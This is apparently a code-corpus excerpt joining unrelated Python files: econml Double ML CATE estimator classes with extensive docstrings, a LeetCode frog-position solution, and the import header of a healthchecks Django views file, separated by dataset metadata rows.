    In this estimator, the CATE is estimated by using the following estimating equations:

    .. math ::
        Y - \\E[Y | X, W] = \\Theta(X) \\cdot (T - \\E[T | X, W]) + \\epsilon

    Thus if we estimate the nuisance functions :math:`q(X, W) = \\E[Y | X, W]` and
    :math:`f(X, W)=\\E[T | X, W]` in the first stage, we can estimate the final stage cate for each
    treatment t, by running a regression, minimizing the residual on residual square loss:

    .. math ::
        \\hat{\\theta} = \\arg\\min_{\\Theta}\
        \\E_n\\left[ (\\tilde{Y} - \\Theta(X) \\cdot \\tilde{T})^2 \\right]

    Where :math:`\\tilde{Y}=Y - \\E[Y | X, W]` and :math:`\\tilde{T}=T-\\E[T | X, W]` denotes the
    residual outcome and residual treatment.

    The DMLCateEstimator further assumes a linear parametric form for the cate, i.e. for each outcome
    :math:`i` and treatment :math:`j`:

    .. math ::
        \\Theta_{i, j}(X) = \\phi(X)' \\cdot \\Theta_{ij}

    For some given feature mapping :math:`\\phi(X)` (the user can provide this featurizer via the `featurizer`
    parameter at init time and could be any arbitrary class that adheres to the scikit-learn transformer
    interface :class:`~sklearn.base.TransformerMixin`).

    The second nuisance function :math:`q` is a simple regression problem and the
    :class:`.DMLCateEstimator`
    class takes as input the parameter `model_y`, which is an arbitrary scikit-learn regressor that
    is internally used to solve this regression problem.

    The problem of estimating the nuisance function :math:`f` is also a regression problem and
    the :class:`.DMLCateEstimator`
    class takes as input the parameter `model_t`, which is an arbitrary scikit-learn regressor that
    is internally used to solve this regression problem. If the init flag `discrete_treatment` is set
    to `True`, then the parameter `model_t` is treated as a scikit-learn classifier. The input categorical
    treatment is one-hot encoded (excluding the lexicographically smallest treatment which is used as the
    baseline) and the `predict_proba` method of the `model_t` classifier is used to
    residualize the one-hot encoded treatment.

    The final stage is (potentially multi-task) linear regression problem with outcomes the labels
    :math:`\\tilde{Y}` and regressors the composite features
    :math:`\\tilde{T}\\otimes \\phi(X) = \\mathtt{vec}(\\tilde{T}\\cdot \\phi(X)^T)`.
    The :class:`.DMLCateEstimator` takes as input parameter
    ``model_final``, which is any linear scikit-learn regressor that is internally used to solve this
    (multi-task) linear regresion problem.

    Parameters
    ----------
    model_y: estimator
        The estimator for fitting the response to the features. Must implement
        `fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.

    model_t: estimator or 'auto' (default is 'auto')
        The estimator for fitting the treatment to the features.
        If estimator, it must implement `fit` and `predict` methods.  Must be a linear model for correctness
        when linear_first_stages is ``True``;
        If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV`
        will be applied for discrete treatment,
        and :class:`.WeightedLassoCV`/
        :class:`.WeightedMultiTaskLassoCV`
        will be applied for continuous treatment.

    model_final: estimator
        The estimator for fitting the response residuals to the treatment residuals. Must implement
        `fit` and `predict` methods, and must be a linear model for correctness.

    featurizer: :term:`transformer`, optional, default None
        Must support fit_transform and transform. Used to create composite features in the final CATE regression.
        It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
        If featurizer=None, then CATE is trained on X.

    fit_cate_intercept : bool, optional, default True
        Whether the linear CATE model should have a constant term.

    linear_first_stages: bool
        Whether the first stage models are linear (in which case we will expand the features passed to
        `model_y` accordingly)

    discrete_treatment: bool, optional, default False
        Whether the treatment values should be treated as categorical, rather than continuous, quantities

    categories: 'auto' or list, default 'auto'
        The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
        The first category will be treated as the control treatment.

    n_splits: int, cross-validation generator or an iterable, optional, default 2
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:

        - None, to use the default 3-fold cross-validation,
        - integer, to specify the number of folds.
        - :term:`cv splitter`
        - An iterable yielding (train, test) splits as arrays of indices.

        For integer/None inputs, if the treatment is discrete
        :class:`~sklearn.model_selection.StratifiedKFold` is used, else,
        :class:`~sklearn.model_selection.KFold` is used
        (with a random shuffle in either case).

        Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
        W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.

    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
        If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
        by :mod:`np.random<numpy.random>`.
    """

    def __init__(self,
                 model_y, model_t, model_final,
                 featurizer=None,
                 fit_cate_intercept=True,
                 linear_first_stages=False,
                 discrete_treatment=False,
                 categories='auto',
                 n_splits=2,
                 random_state=None):
        # TODO: consider whether we need more care around stateful featurizers,
        # since we clone it and fit separate copies
        # Resolve the 'auto' treatment model: a CV logistic classifier for
        # discrete treatments, a weighted lasso CV regressor otherwise.
        if model_t == 'auto':
            if discrete_treatment:
                model_t = LogisticRegressionCV(cv=WeightedStratifiedKFold())
            else:
                model_t = WeightedLassoCVWrapper()
        # When the intercept is fit, it lives inside the final model's
        # coefficient vector — presumably consumed by the inference
        # machinery; confirm against the inference classes.
        self.bias_part_of_coef = fit_cate_intercept
        self.fit_cate_intercept = fit_cate_intercept
        super().__init__(model_y=_FirstStageWrapper(model_y, True,
                                                    featurizer, linear_first_stages, discrete_treatment),
                         model_t=_FirstStageWrapper(model_t, False,
                                                    featurizer, linear_first_stages, discrete_treatment),
                         model_final=_FinalWrapper(model_final, fit_cate_intercept, featurizer, False),
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_splits,
                         random_state=random_state)
class LinearDMLCateEstimator(StatsModelsCateEstimatorMixin, DMLCateEstimator):
    """
    The Double ML Estimator with a low-dimensional linear final stage implemented as a statsmodel regression.
    Parameters
    ----------
    model_y: estimator, optional (default is :class:`.WeightedLassoCVWrapper`)
        The estimator for fitting the response to the features. Must implement
        `fit` and `predict` methods.
    model_t: estimator or 'auto', optional (default is 'auto')
        The estimator for fitting the treatment to the features.
        If estimator, it must implement `fit` and `predict` methods;
        If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be applied for discrete treatment,
        and :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV`
        will be applied for continuous treatment.
    featurizer : :term:`transformer`, optional, default None
        Must support fit_transform and transform. Used to create composite features in the final CATE regression.
        It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
        If featurizer=None, then CATE is trained on X.
    fit_cate_intercept : bool, optional, default True
        Whether the linear CATE model should have a constant term.
    linear_first_stages: bool
        Whether the first stage models are linear (in which case we will expand the features passed to
        `model_y` accordingly)
    discrete_treatment: bool, optional (default is ``False``)
        Whether the treatment values should be treated as categorical, rather than continuous, quantities
    categories: 'auto' or list, default 'auto'
        The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
        The first category will be treated as the control treatment.
    n_splits: int, cross-validation generator or an iterable, optional (Default=2)
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:
        - None, to use the default 3-fold cross-validation,
        - integer, to specify the number of folds.
        - :term:`cv splitter`
        - An iterable yielding (train, test) splits as arrays of indices.
        For integer/None inputs, if the treatment is discrete
        :class:`~sklearn.model_selection.StratifiedKFold` is used, else,
        :class:`~sklearn.model_selection.KFold` is used
        (with a random shuffle in either case).
        Unless an iterable is used, we call `split(X,T)` to generate the splits.
    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
        If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
        by :mod:`np.random<numpy.random>`.
    """
    def __init__(self,
                 model_y=WeightedLassoCVWrapper(), model_t='auto',
                 featurizer=None,
                 fit_cate_intercept=True,
                 linear_first_stages=True,
                 discrete_treatment=False,
                 categories='auto',
                 n_splits=2,
                 random_state=None):
        super().__init__(model_y=model_y,
                         model_t=model_t,
                         model_final=StatsModelsLinearRegression(fit_intercept=False),
                         featurizer=featurizer,
                         fit_cate_intercept=fit_cate_intercept,
                         linear_first_stages=linear_first_stages,
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_splits,
                         random_state=random_state)
    # override only so that we can update the docstring to indicate support for `StatsModelsInference`
    def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
        """
        Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
        Parameters
        ----------
        Y: (n × d_y) matrix or vector of length n
            Outcomes for each sample
        T: (n × dₜ) matrix or vector of length n
            Treatments for each sample
        X: optional (n × dₓ) matrix
            Features for each sample
        W: optional (n × d_w) matrix
            Controls for each sample
        sample_weight: optional (n,) vector
            Weights for each row
        sample_var: optional (n, n_y) vector
            Variance of sample, in case it corresponds to a summary of many samples;
            forwarded unchanged to the base class `fit`.
        inference: string, :class:`.Inference` instance, or None
            Method for performing inference. This estimator supports 'bootstrap'
            (or an instance of :class:`.BootstrapInference`) and 'statsmodels'
            (or an instance of :class:`.StatsModelsInference`)
        Returns
        -------
        self
        """
        return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=sample_var, inference=inference)
class SparseLinearDMLCateEstimator(DebiasedLassoCateEstimatorMixin, DMLCateEstimator):
    """
    A specialized version of the Double ML estimator for the sparse linear case.
    This estimator should be used when the features of heterogeneity are high-dimensional
    and the coefficients of the linear CATE function are sparse.
    The last stage is an instance of the
    :class:`.MultiOutputDebiasedLasso`
    Parameters
    ----------
    model_y: estimator, optional (default is :class:`WeightedLassoCVWrapper()
        <econml.sklearn_extensions.linear_model.WeightedLassoCVWrapper>`)
        The estimator for fitting the response to the features. Must implement
        `fit` and `predict` methods.
    model_t: estimator or 'auto', optional (default is 'auto')
        The estimator for fitting the treatment to the features.
        If estimator, it must implement `fit` and `predict` methods, and must be a
        linear model for correctness;
        If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV`
        will be applied for discrete treatment,
        and :class:`.WeightedLassoCV`/
        :class:`.WeightedMultiTaskLassoCV`
        will be applied for continuous treatment.
    alpha: string | float, optional. Default='auto'.
        CATE L1 regularization applied through the debiased lasso in the final model.
        'auto' corresponds to a CV form of the :class:`MultiOutputDebiasedLasso`.
    max_iter : int, optional, default=1000
        The maximum number of iterations in the Debiased Lasso
    tol : float, optional, default=1e-4
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.
    featurizer : :term:`transformer`, optional, default None
        Must support fit_transform and transform. Used to create composite features in the final CATE regression.
        It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
        If featurizer=None, then CATE is trained on X.
    fit_cate_intercept : bool, optional, default True
        Whether the linear CATE model should have a constant term.
    linear_first_stages: bool
        Whether the first stage models are linear (in which case we will expand the features passed to
        `model_y` accordingly)
    discrete_treatment: bool, optional (default is ``False``)
        Whether the treatment values should be treated as categorical, rather than continuous, quantities
    categories: 'auto' or list, default 'auto'
        The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
        The first category will be treated as the control treatment.
    n_splits: int, cross-validation generator or an iterable, optional (Default=2)
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:
        - None, to use the default 3-fold cross-validation,
        - integer, to specify the number of folds.
        - :term:`cv splitter`
        - An iterable yielding (train, test) splits as arrays of indices.
        For integer/None inputs, if the treatment is discrete
        :class:`~sklearn.model_selection.StratifiedKFold` is used, else,
        :class:`~sklearn.model_selection.KFold` is used
        (with a random shuffle in either case).
        Unless an iterable is used, we call `split(X,T)` to generate the splits.
    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
        If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
        by :mod:`np.random<numpy.random>`.
    """
    def __init__(self,
                 model_y=WeightedLassoCVWrapper(), model_t='auto',
                 alpha='auto',
                 max_iter=1000,
                 tol=1e-4,
                 featurizer=None,
                 fit_cate_intercept=True,
                 linear_first_stages=True,
                 discrete_treatment=False,
                 categories='auto',
                 n_splits=2,
                 random_state=None):
        # Final stage: debiased lasso, so the sparse CATE coefficients come with
        # confidence intervals. fit_intercept=False -- the CATE intercept is
        # governed by fit_cate_intercept, presumably applied by the base class's
        # final-model wrapper (cf. DMLCateEstimator.__init__) -- confirm there.
        model_final = MultiOutputDebiasedLasso(
            alpha=alpha,
            fit_intercept=False,
            max_iter=max_iter,
            tol=tol)
        super().__init__(model_y=model_y,
                         model_t=model_t,
                         model_final=model_final,
                         featurizer=featurizer,
                         fit_cate_intercept=fit_cate_intercept,
                         linear_first_stages=linear_first_stages,
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_splits,
                         random_state=random_state)
    def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
        """
        Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
        Parameters
        ----------
        Y: (n × d_y) matrix or vector of length n
            Outcomes for each sample
        T: (n × dₜ) matrix or vector of length n
            Treatments for each sample
        X: optional (n × dₓ) matrix
            Features for each sample
        W: optional (n × d_w) matrix
            Controls for each sample
        sample_weight: optional (n,) vector
            Weights for each row
        sample_var: optional (n, n_y) vector
            Variance of sample, in case it corresponds to summary of many samples. Currently
            not in use by this method but will be supported in a future release.
        inference: string, `Inference` instance, or None
            Method for performing inference. This estimator supports 'bootstrap'
            (or an instance of :class:`.BootstrapInference`) and 'debiasedlasso'
            (or an instance of :class:`.LinearModelFinalInference`)
        Returns
        -------
        self
        """
        # TODO: support sample_var
        if sample_var is not None and inference is not None:
            warn("This estimator does not yet support sample variances and inference does not take "
                 "sample variances into account. This feature will be supported in a future release.")
        # Nudge the user towards LinearDMLCateEstimator when the final-stage
        # feature space is too low-dimensional for a sparse model to pay off.
        check_high_dimensional(X, T, threshold=5, featurizer=self.featurizer,
                               discrete_treatment=self._discrete_treatment,
                               msg="The number of features in the final model (< 5) is too small for a sparse model. "
                               "We recommend using the LinearDMLCateEstimator for this low-dimensional setting.")
        # sample_var is deliberately replaced with None until it is supported.
        return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=None, inference=inference)
class _RandomFeatures(TransformerMixin):
    """Random Fourier feature transformer (random cosine features)."""
    def __init__(self, dim, bw, random_state):
        # Number of random cosine features to generate.
        self._dim = dim
        # Bandwidth: frequencies are drawn with standard deviation 1 / bw.
        self._bw = bw
        self._random_state = check_random_state(random_state)
    def fit(self, X):
        """Sample random frequencies and phase offsets matching X's width."""
        n_inputs = shape(X)[1]
        self.omegas = self._random_state.normal(0, 1 / self._bw, size=(n_inputs, self._dim))
        self.biases = self._random_state.uniform(0, 2 * np.pi, size=(1, self._dim))
        return self
    def transform(self, X):
        """Project X onto the sampled frequencies and apply the cosine map."""
        projected = np.matmul(X, self.omegas) + self.biases
        return np.sqrt(2 / self._dim) * np.cos(projected)
class KernelDMLCateEstimator(DMLCateEstimator):
    """
    A linear Double ML estimator whose final stage operates on random fourier features.
    Parameters
    ----------
    model_y: estimator, optional (default is :class:`<econml.sklearn_extensions.linear_model.WeightedLassoCVWrapper>`)
        Estimator predicting the response from the features; must implement
        `fit` and `predict` methods.
    model_t: estimator or 'auto', optional (default is 'auto')
        Estimator predicting the treatment from the features; must implement
        `fit` and `predict` methods. With 'auto',
        :class:`~sklearn.linear_model.LogisticRegressionCV` is used for discrete
        treatment and :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV`
        for continuous treatment.
    fit_cate_intercept : bool, optional, default True
        Whether the linear CATE model includes a constant term.
    dim: int, optional (default is 20)
        How many random Fourier features to draw.
    bw: float, optional (default is 1.0)
        Bandwidth of the Gaussian used to draw the random features.
    discrete_treatment: bool, optional (default is ``False``)
        Whether treatment values are categorical rather than continuous quantities.
    categories: 'auto' or list, default 'auto'
        Categories used to encode discrete treatments ('auto' = unique sorted values);
        the first category is treated as the control treatment.
    n_splits: int, cross-validation generator or an iterable, optional (Default=2)
        Cross-fitting strategy; same semantics as in :class:`DMLCateEstimator`
        (None -> default 3-fold, int -> number of folds, or a cv splitter /
        iterable of (train, test) index arrays; stratified for discrete treatment).
    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        Seed or generator controlling all randomness, including the random
        Fourier featurization.
    """
    def __init__(self, model_y=WeightedLassoCVWrapper(), model_t='auto', fit_cate_intercept=True,
                 dim=20, bw=1.0, discrete_treatment=False, categories='auto', n_splits=2, random_state=None):
        # ElasticNetCV final stage on top of the random Fourier featurization.
        fourier_featurizer = _RandomFeatures(dim, bw, random_state)
        super().__init__(model_y=model_y, model_t=model_t,
                         model_final=ElasticNetCV(fit_intercept=False),
                         featurizer=fourier_featurizer,
                         fit_cate_intercept=fit_cate_intercept,
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_splits, random_state=random_state)
class NonParamDMLCateEstimator(_BaseDMLCateEstimator):
    """
    The base class for non-parametric Double ML estimators, that can have arbitrary final ML models of the CATE.
    Works only for single-dimensional continuous treatment or for binary categorical treatment and uses
    the re-weighting trick, reducing the final CATE estimation to a weighted square loss minimization.
    The model_final parameter must support the sample_weight keyword argument at fit time.
    Parameters
    ----------
    model_y: estimator
        The estimator for fitting the response to the features. Must implement
        `fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
    model_t: estimator
        The estimator for fitting the treatment to the features. Must implement
        `fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
    model_final: estimator
        The estimator for fitting the response residuals to the treatment residuals. Must implement
        `fit` and `predict` methods. It can be an arbitrary scikit-learn regressor. The `fit` method
        must accept `sample_weight` as a keyword argument.
    featurizer: transformer
        The transformer used to featurize the raw features when fitting the final model. Must implement
        a `fit_transform` method.
    discrete_treatment: bool, optional (default is ``False``)
        Whether the treatment values should be treated as categorical, rather than continuous, quantities
    categories: 'auto' or list, default 'auto'
        The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
        The first category will be treated as the control treatment.
    n_splits: int, cross-validation generator or an iterable, optional (Default=2)
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:
        - None, to use the default 3-fold cross-validation,
        - integer, to specify the number of folds.
        - :term:`cv splitter`
        - An iterable yielding (train, test) splits as arrays of indices.
        For integer/None inputs, if the treatment is discrete
        :class:`~sklearn.model_selection.StratifiedKFold` is used, else,
        :class:`~sklearn.model_selection.KFold` is used
        (with a random shuffle in either case).
        Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
        W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
        If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
        by :mod:`np.random<numpy.random>`.
    """
    def __init__(self,
                 model_y, model_t, model_final,
                 featurizer=None,
                 discrete_treatment=False,
                 categories='auto',
                 n_splits=2,
                 random_state=None):
        # TODO: consider whether we need more care around stateful featurizers,
        # since we clone it and fit separate copies
        # NOTE(review): in the _FirstStageWrapper calls the second positional
        # argument appears to mark whether the wrapped model predicts Y (True)
        # or T (False), and the fourth (linear_first_stages) is hard-coded to
        # False here -- cf. the parallel call in DMLCateEstimator.__init__.
        # Confirm against the wrapper definitions.
        super().__init__(model_y=_FirstStageWrapper(model_y, True,
                                                    featurizer, False, discrete_treatment),
                         model_t=_FirstStageWrapper(model_t, False,
                                                    featurizer, False, discrete_treatment),
                         model_final=_FinalWrapper(model_final, False, featurizer, True),
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_splits,
                         random_state=random_state)
class ForestDMLCateEstimator(NonParamDMLCateEstimator):
    """ Instance of NonParamDMLCateEstimator with a
    :class:`~econml.sklearn_extensions.ensemble.SubsampledHonestForest`
    as a final model, so as to enable non-parametric inference.
    Parameters
    ----------
    model_y: estimator
        The estimator for fitting the response to the features. Must implement
        `fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
    model_t: estimator
        The estimator for fitting the treatment to the features. Must implement
        `fit` and `predict` methods. Must be a linear model for correctness when linear_first_stages is ``True``.
    discrete_treatment: bool, optional (default is ``False``)
        Whether the treatment values should be treated as categorical, rather than continuous, quantities
    categories: 'auto' or list, default 'auto'
        The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
        The first category will be treated as the control treatment.
    n_crossfit_splits: int, cross-validation generator or an iterable, optional (Default=2)
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:
        - None, to use the default 3-fold cross-validation,
        - integer, to specify the number of folds.
        - :term:`cv splitter`
        - An iterable yielding (train, test) splits as arrays of indices.
        For integer/None inputs, if the treatment is discrete
        :class:`~sklearn.model_selection.StratifiedKFold` is used, else,
        :class:`~sklearn.model_selection.KFold` is used
        (with a random shuffle in either case).
        Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
        W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
    n_estimators : integer, optional (default=100)
        The total number of trees in the forest. The forest consists of a
        forest of sqrt(n_estimators) sub-forests, where each sub-forest
        contains sqrt(n_estimators) trees.
    criterion : string, optional (default="mse")
        The function to measure the quality of a split. Supported criteria
        are "mse" for the mean squared error, which is equal to variance
        reduction as feature selection criterion, and "mae" for the mean
        absolute error.
    max_depth : integer or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.
    min_samples_split : int, float, optional (default=2)
        The minimum number of splitting samples required to split an internal node.
        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a fraction and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.
    min_samples_leaf : int, float, optional (default=1)
        The minimum number of samples required to be at a leaf node.
        A split point at any depth will only be considered if it leaves at
        least ``min_samples_leaf`` splitting samples in each of the left and
        right branches. This may have the effect of smoothing the model,
        especially in regression. After construction the tree is also pruned
        so that there are at least min_samples_leaf estimation samples on
        each leaf.
        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a fraction and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.
    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the sum total of weights (of all
        splitting samples) required to be at a leaf node. Samples have
        equal weight when sample_weight is not provided. After construction
        the tree is pruned so that the fraction of the sum total weight
        of the estimation samples contained in each leaf node is at
        least min_weight_fraction_leaf
    max_features : int, float, string or None, optional (default="auto")
        The number of features to consider when looking for the best split:
        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a fraction and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=n_features`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.
    max_leaf_nodes : int or None, optional (default=None)
        Grow trees with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.
    min_impurity_decrease : float, optional (default=0.)
        A node will be split if this split induces a decrease of the impurity
        greater than or equal to this value.
        The weighted impurity decrease equation is the following::
            N_t / N * (impurity - N_t_R / N_t * right_impurity
                - N_t_L / N_t * left_impurity)
        where ``N`` is the total number of split samples, ``N_t`` is the number of
        split samples at the current node, ``N_t_L`` is the number of split samples in the
        left child, and ``N_t_R`` is the number of split samples in the right child.
        ``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
        if ``sample_weight`` is passed.
    subsample_fr : float or 'auto', optional (default='auto')
        The fraction of the half-samples that are used on each tree. Each tree
        will be built on subsample_fr * n_samples/2.
        If 'auto', then the subsampling fraction is set to::
            (n_samples/2)**(1-1/(2*n_features+2))/(n_samples/2)
        which is sufficient to guarantee asympotitcally valid inference.
    honest : boolean, optional (default=True)
        Whether to use honest trees, i.e. half of the samples are used for
        creating the tree structure and the other half for the estimation at
        the leafs. If False, then all samples are used for both parts.
    n_jobs : int or None, optional (default=None)
        The number of jobs to run in parallel for both `fit` and `predict`.
        ``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.
    verbose : int, optional (default=0)
        Controls the verbosity when fitting and predicting.
    random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
        If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
        by :mod:`np.random<numpy.random>`.
    """
    def __init__(self,
                 model_y, model_t,
                 discrete_treatment=False,
                 categories='auto',
                 n_crossfit_splits=2,
                 n_estimators=100,
                 criterion="mse",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 max_leaf_nodes=None,
                 min_impurity_decrease=0.,
                 subsample_fr='auto',
                 honest=True,
                 n_jobs=None,
                 verbose=0,
                 random_state=None):
        # Final-stage model: an honest forest; its kwargs mirror this __init__.
        model_final = SubsampledHonestForest(n_estimators=n_estimators,
                                             criterion=criterion,
                                             max_depth=max_depth,
                                             min_samples_split=min_samples_split,
                                             min_samples_leaf=min_samples_leaf,
                                             min_weight_fraction_leaf=min_weight_fraction_leaf,
                                             max_features=max_features,
                                             max_leaf_nodes=max_leaf_nodes,
                                             min_impurity_decrease=min_impurity_decrease,
                                             subsample_fr=subsample_fr,
                                             honest=honest,
                                             n_jobs=n_jobs,
                                             random_state=random_state,
                                             verbose=verbose)
        super().__init__(model_y=model_y, model_t=model_t,
                         model_final=model_final, featurizer=None,
                         discrete_treatment=discrete_treatment,
                         categories=categories,
                         n_splits=n_crossfit_splits, random_state=random_state)
    def _get_inference_options(self):
        # add the Bootstrap-of-Little-Bags ('blb') option to the parent's options
        options = super()._get_inference_options()
        options.update(blb=GenericSingleTreatmentModelFinalInference)
        return options
    def fit(self, Y, T, X=None, W=None, sample_weight=None, sample_var=None, inference=None):
        """
        Estimate the counterfactual model from data, i.e. estimates functions τ(·,·,·), ∂τ(·,·).
        Parameters
        ----------
        Y: (n × d_y) matrix or vector of length n
            Outcomes for each sample
        T: (n × dₜ) matrix or vector of length n
            Treatments for each sample
        X: optional (n × dₓ) matrix
            Features for each sample
        W: optional (n × d_w) matrix
            Controls for each sample
        sample_weight: optional (n,) vector
            Weights for each row
        sample_var: optional (n, n_y) vector
            Variance of sample, in case it corresponds to summary of many samples. Currently
            not in use by this method (as inference method does not require sample variance info).
        inference: string, `Inference` instance, or None
            Method for performing inference. This estimator supports 'bootstrap'
            (or an instance of :class:`.BootstrapInference`) and 'blb'
            (for Bootstrap-of-Little-Bags based inference)
        Returns
        -------
        self
        """
        # sample_var is deliberately dropped (passed as None); see the docstring above.
        return super().fit(Y, T, X=X, W=W, sample_weight=sample_weight, sample_var=None, inference=inference)
| 48.609489 | 118 | 0.645732 |
acf6d6474e7f1dfb882b674b5691cf4133a1cd2c | 1,036 | py | Python | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 4 | 2020-09-11T02:36:11.000Z | 2021-09-29T20:47:11.000Z | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 3 | 2020-09-10T03:51:42.000Z | 2021-09-25T01:41:57.000Z | 1377 Frog Position After T Seconds.py | MdAbedin/leetcode | e835f2e716ea5fe87f30b84801ede9bc023749e7 | [
"MIT"
] | 6 | 2020-09-10T03:46:15.000Z | 2021-09-25T01:24:48.000Z | class Solution:
def frogPosition(self, n: int, edges: List[List[int]], t: int, target: int) -> float:
neighbors = defaultdict(list)
probs = dict()
for edge in edges:
a,b = edge
neighbors[a].append(b)
neighbors[b].append(a)
bfs = deque([1])
probs[1] = 1
while bfs and t:
for i in range(len(bfs)):
cur = bfs.popleft()
num_unvisited_neighbors = 0
for neighbor in neighbors[cur]:
if neighbor not in probs:
num_unvisited_neighbors += 1
bfs.append(neighbor)
for neighbor in neighbors[cur]:
if neighbor not in probs:
probs[neighbor] = probs[cur]/num_unvisited_neighbors
if num_unvisited_neighbors:
probs[cur] = 0
t -= 1
return probs[target] if target in probs else 0
| 30.470588 | 89 | 0.470077 |
acf6d70f95073448da1fddd0defc6eec57736180 | 62,527 | py | Python | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | hc/front/views.py | ArpitKotecha/healthchecks | 44a677f327ac5da162eb9cbc0214c396bb2bf77e | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime, timedelta as td
import json
import os
import re
from secrets import token_urlsafe
from urllib.parse import urlencode
from cron_descriptor import ExpressionDescriptor
from croniter import croniter
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core import signing
from django.core.exceptions import PermissionDenied
from django.db.models import Count
from django.http import (
Http404,
HttpResponse,
HttpResponseBadRequest,
HttpResponseForbidden,
JsonResponse,
)
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
